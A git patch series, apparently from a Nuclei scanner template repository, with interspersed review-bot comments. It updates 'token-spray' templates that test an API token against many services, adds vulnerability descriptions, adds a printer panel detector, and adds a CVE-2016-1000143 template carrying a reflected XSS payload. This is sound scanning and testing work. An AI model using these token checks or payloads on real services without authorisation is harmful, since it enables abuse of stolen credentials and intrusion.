diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml
index 62795ea15e..5eaf5abb5d 100644
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml
index 91826af391..21d1ea1781 100644
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml
index 88d1ce9ffc..07684fe0e1 100644
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@@ -12,6 +12,7 @@ requests:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
+ self-contained: true
matchers:
- type: word
part: body
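Review bot: `self-contained: true` is inserted between `matchers-condition: and` and `matchers:` here, while the other token-spray hunks in this patch place it ahead of the matcher keys. The result parses the same, but separating the two matcher keys makes the condition easy to overlook when reading the template. Move the flag up one line so the order is `self-contained: true`, `matchers-condition: and`, `matchers:`.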
diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml
index d7b47585f1..d7d9c5e05f 100644
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml
index 5f8e4d2721..8fd69d623d 100644
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml
index 752d9d9814..d40f6d479c 100644
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml
index e804422ff0..ab8ebf2b98 100644
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml
index 30ca3e6184..3a9935ba6a 100644
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml
index 82f33c2e1d..88790a68ec 100644
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml
index 2e38d6316a..e034096bfc 100644
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml
index c97cfcee59..4efb960afd 100644
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml
index 5eec3d0a53..dd06969472 100644
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml
index d4a012bff2..5011053baf 100644
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml
index 49d043391d..cc0344919f 100644
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml
index 273101bcc9..33f8002db5 100644
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
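Review bot: The query string on the `path` context line reads `...-119.6822510×tamp=1331161200`, which looks like `&timestamp=` after `&times` was decoded as an HTML entity. If the file itself contains the `×` character, the request is sent without its `timestamp` parameter and the body word matcher may never see a success response, so a valid key would go unreported. In that case the line should read `...location=39.6034810,-119.6822510&timestamp=1331161200&key={{token}}`. If this is only an artifact of how the patch was rendered, nothing needs to change.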
diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml
index c3683703cf..29e5fcca5a 100644
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml
index 9f08e416d5..ec76722f11 100644
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@@ -15,6 +15,7 @@ requests:
Accept: application/vnd.heroku+json; version=3
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml
index 86566864f0..b1a796d113 100644
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@@ -13,6 +13,7 @@ requests:
- "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}"
- "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml
index 289546f452..8ab1b9131d 100644
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml
index f64daea02e..4c912bf0b7 100644
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://api.ipstack.com/8.8.8.8?access_key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index 0c1f84d566..a4d77e7575 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Api_Key: "{{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml
index a885c5c780..cdfbdba931 100644
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@@ -14,6 +14,7 @@ requests:
headers:
X-Api-Key: "{{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml
index 0c937b51fa..5ca1351c6d 100644
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@@ -14,6 +14,7 @@ requests:
headers:
X-Api-Token: "{{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml
index d0ed434602..2cbb1f4e69 100644
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"
+ self-contained: true
matchers:
- type: word
part: body
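Review bot: The `path` entry on the context line has no scheme (`api.addressy.com/Capture/...`), and this hunk marks the request `self-contained`, so there is no `{{BaseURL}}` to supply one. Every other token-spray template touched in this series uses an absolute `https://` URL. This one should read `- "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR"`. Without the scheme the request presumably fails to build or resolve, and a live key would be silently missed. The `requests` block starts before this hunk.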
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml
index 9d7073e46c..840ab656f4 100644
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@@ -14,6 +14,7 @@ network:
host:
- "tls://smtp.mandrillapp.com:465"
+ self-contained: true
matchers:
- type: word
words:
diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml
index 3667ba1c69..67d7c356bd 100644
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Basic {{base64('api:' + token)}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml
index c4640d9695..5e68a1ec4b 100644
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml
index d67d458faa..a0b6cddb77 100644
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@@ -16,6 +16,7 @@ requests:
API-Key: "{{token}}"
body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml
index cfe2c86746..6105c678db 100644
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml
index 1a9a5058e3..4c32828a44 100644
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml
index fcc00d7e88..48756e267e 100644
--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@@ -15,6 +15,7 @@ requests:
Accept: application/vnd.pagerduty+json;version=2
Authorization: Token token={{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml
index 8ea141bcc0..5a46a542a8 100644
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@@ -16,6 +16,7 @@ requests:
Content-Type: application/json
X-Pendo-Integration-Key: "{{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml
index c52e04af9a..29e6e32c56 100644
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@@ -14,6 +14,7 @@ requests:
headers:
X-TrackerToken: "{{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml
index 5b5aead0dc..72480a7efc 100644
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@@ -15,6 +15,7 @@ requests:
Accept: application/json
X-Postmark-Server-Token: "{{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml
index b887b0b7d1..b84a41a488 100644
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@@ -16,6 +16,7 @@ network:
host:
- "tls://smtp.sendgrid.net:465"
+ self-contained: true
matchers:
- type: word
words:
diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml
index 2703830f3a..e9e2a0af1e 100644
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml
index fdf0dc6724..9ca1db987c 100644
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Basic {{base64(token + ':')}}
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml
index 2ccc098209..7cb306b924 100644
--- a/token-spray/spotify.yaml
+++ b/token-spray/spotify.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/square.yaml b/token-spray/square.yaml
index 383e3ddc8a..2a5f7210fb 100644
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@@ -16,6 +16,7 @@ requests:
Content-Type: application/json
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml
index 16e358e75a..15dd931744 100644
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Basic {{base64(token + ':')}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml
index 922e62848b..44598c428a 100644
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Basic {{base64('api:' + token)}}
+ self-contained: true
matchers:
- type: word
part: header
diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml
index 5212516fc1..c17c49290f 100644
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@@ -15,6 +15,7 @@ requests:
Travis-API-Version: 3
Authorization: token {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml
index d648daa0d1..9657045185 100644
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml
index a05d17e57a..d7d6c6b836 100644
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@@ -15,6 +15,7 @@ requests:
Content-Type: application/json
X-Api-Token: "{{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml
index b48ed5e79f..c54d184fc1 100644
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml
index 9c1a8e2874..79ddab793f 100644
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@@ -15,6 +15,7 @@ requests:
Content-Type: application/json
body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml
index 3ab7726092..1546808ea7 100644
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@@ -13,6 +13,7 @@ requests:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
matchers-condition: or
+ self-contained: true
matchers:
- type: word
part: body
From 68b63a9ca5e9e08532a27a16e26410ab6d752339 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Fri, 15 Oct 2021 00:18:16 +0530
Subject: [PATCH 04/39] misc readme update
---
token-spray/README.md | 14 +++++++++-----
1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/token-spray/README.md b/token-spray/README.md
index 24081b4662..e49667d4b7 100644
--- a/token-spray/README.md
+++ b/token-spray/README.md
@@ -1,15 +1,19 @@
## About
+
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
-You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
-# Run Nuclei specifying all the api templates:
+**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
+# Running token-spray templates against a single token to test
+nuclei -t token-spray/ -var token=random-token-to-test
+
+# Running token-spray templates against a file containing multiple new line delimited tokens
+nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
-These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
+These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
\ No newline at end of file
From 6d5e933128fe1078f1ab833cdc54e08fd097fc4f Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Tue, 19 Oct 2021 12:56:40 +0300
Subject: [PATCH 05/39] Add description
---
vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
index f175d20028..a098023ed9 100644
--- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
+++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: CS-Cart unauthenticated LFI
author: 0x_Akoko
severity: high
+ description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
reference: https://cxsecurity.com/issue/WLB-2020100100
tags: cscart,lfi
From 5c910ab3b4d0f90907f4f4d9c31eda2600477023 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Tue, 19 Oct 2021 13:03:41 +0300
Subject: [PATCH 06/39] Add description
---
vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
index 73c8f7c160..3fca056486 100644
--- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
+++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml
@@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: high
tags: luftguitar
+ description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint.
reference: https://www.exploit-db.com/exploits/14991
requests:
From d1684e7d67e743a5144bc8aa6ddf1f0aec94ecaf Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Tue, 19 Oct 2021 13:10:29 +0300
Subject: [PATCH 07/39] Add description
---
vulnerabilities/other/minimouse-lfi.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml
index 2fe4f3ad61..22c5a7ef9a 100644
--- a/vulnerabilities/other/minimouse-lfi.yaml
+++ b/vulnerabilities/other/minimouse-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: Mini Mouse 9.2.0 - Path Traversal
author: 0x_Akoko
severity: high
+ description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
reference: https://www.exploit-db.com/exploits/49744
tags: minimouse,lfi
From e45550f4edfac6548cddd7da049c5cfb1d8078ee Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Tue, 19 Oct 2021 13:10:34 +0300
Subject: [PATCH 08/39] Add description
---
vulnerabilities/other/magicflow-lfi.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml
index 19f61c01ef..08cf21df8d 100644
--- a/vulnerabilities/other/magicflow-lfi.yaml
+++ b/vulnerabilities/other/magicflow-lfi.yaml
@@ -4,6 +4,7 @@ info:
name: MagicFlow - Local File Inclusion
author: gy741
severity: critical
+ description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
reference: https://www.seebug.org/vuldb/ssvid-89258
tags: magicflow,lfi
From cfa3a798f3993de15c9b9a0413142bb2224f9352 Mon Sep 17 00:00:00 2001
From: Noam Rathaus
Date: Tue, 19 Oct 2021 13:17:58 +0300
Subject: [PATCH 09/39] Add description
---
vulnerabilities/other/lucee-xss.yaml | 1 +
vulnerabilities/other/openvpn-hhi.yaml | 1 +
2 files changed, 2 insertions(+)
diff --git a/vulnerabilities/other/lucee-xss.yaml b/vulnerabilities/other/lucee-xss.yaml
index 63a273a8a0..dea08e0297 100644
--- a/vulnerabilities/other/lucee-xss.yaml
+++ b/vulnerabilities/other/lucee-xss.yaml
@@ -4,6 +4,7 @@ info:
name: Lucee Unauthenticated Reflected XSS
author: incogbyte
severity: medium
+ description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
tags: lucee,xss
requests:
diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml
index 2611426abb..7bcb4e1a2f 100644
--- a/vulnerabilities/other/openvpn-hhi.yaml
+++ b/vulnerabilities/other/openvpn-hhi.yaml
@@ -3,6 +3,7 @@ id: openvpn-hhi
info:
name: OpenVPN Host Header Injection
author: twitter.com/Dheerajmadhukar
+ description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field.
severity: info
tags: openvpn,hostheader-injection
From 4ee63b8bb2483c2185ba5e33e1310f182ccd0449 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 19 Oct 2021 20:38:03 +0530
Subject: [PATCH 10/39] Add files via upload
---
exposed-panels/samsung-printer-detect.yaml | 22 ++++++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 exposed-panels/samsung-printer-detect.yaml
diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml
new file mode 100644
index 0000000000..e1d5389fa2
--- /dev/null
+++ b/exposed-panels/samsung-printer-detect.yaml
@@ -0,0 +1,22 @@
+id: samsung-printer-Detect
+info:
+ name: SAMSUNG Printer Detection
+ author: pussycat0x
+ severity: info
+ metadata:
+ fofa-dork: 'app="SAMSUNG-Printer"'
+ tags: iot
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sws/index.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' SyncThru Web Service '
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
\ No newline at end of file
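Review bot: The template `id` is `samsung-printer-Detect`, mixed-case and different from the file name `samsung-printer-detect.yaml`. Ids are what users filter and de-duplicate on, so it should be `id: samsung-printer-detect`. The word matcher has a single entry, which makes `condition: and` redundant. As shown, the word is only the padded text `' SyncThru Web Service '`; if surrounding markup was part of the intended match, it is worth confirming the literal is what the panel actually returns. The file also ends without a trailing newline.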
From 8ac553e84409ee610e50c1f1cb944ecf48e1b931 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 19 Oct 2021 22:21:58 +0700
Subject: [PATCH 11/39] Create CVE-2016-1000143.yaml
---
cves/2016/CVE-2016-1000143.yaml | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 cves/2016/CVE-2016-1000143.yaml
diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml
new file mode 100644
index 0000000000..95cc66fabf
--- /dev/null
+++ b/cves/2016/CVE-2016-1000143.yaml
@@ -0,0 +1,32 @@
+id: CVE-2016-1000143
+
+info:
+ name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
+ reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
+ tags: cve,cve2016,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
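Review bot: The body matcher's word list holds only `''` as shown here, and an empty word is contained in every body. The template would then report any `200` `text/html` response on that path as vulnerable. The matcher should carry the decoded payload from the request, `- '</script><script>alert(document.domain)</script>'`, so that a hit means the input was reflected unescaped. If the payload was merely stripped when this patch was rendered, no change is needed. The first `reference` entry uses plain `http://`; prefer the `https://` form if the advisory site serves it.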
From 4617e8fb069e3be5d858db742e372ee31b7b4d48 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 20 Oct 2021 14:16:18 +0530
Subject: [PATCH 12/39] more updates
---
token-spray/asana.yaml | 4 ++--
token-spray/bingmaps.yaml | 2 +-
token-spray/bitly.yaml | 2 +-
token-spray/buildkite.yaml | 2 +-
token-spray/buttercms.yaml | 2 +-
token-spray/calendly.yaml | 2 +-
token-spray/circleci.yaml | 2 +-
token-spray/deviantart.yaml | 2 +-
token-spray/dropbox.yaml | 2 +-
token-spray/github.yaml | 2 +-
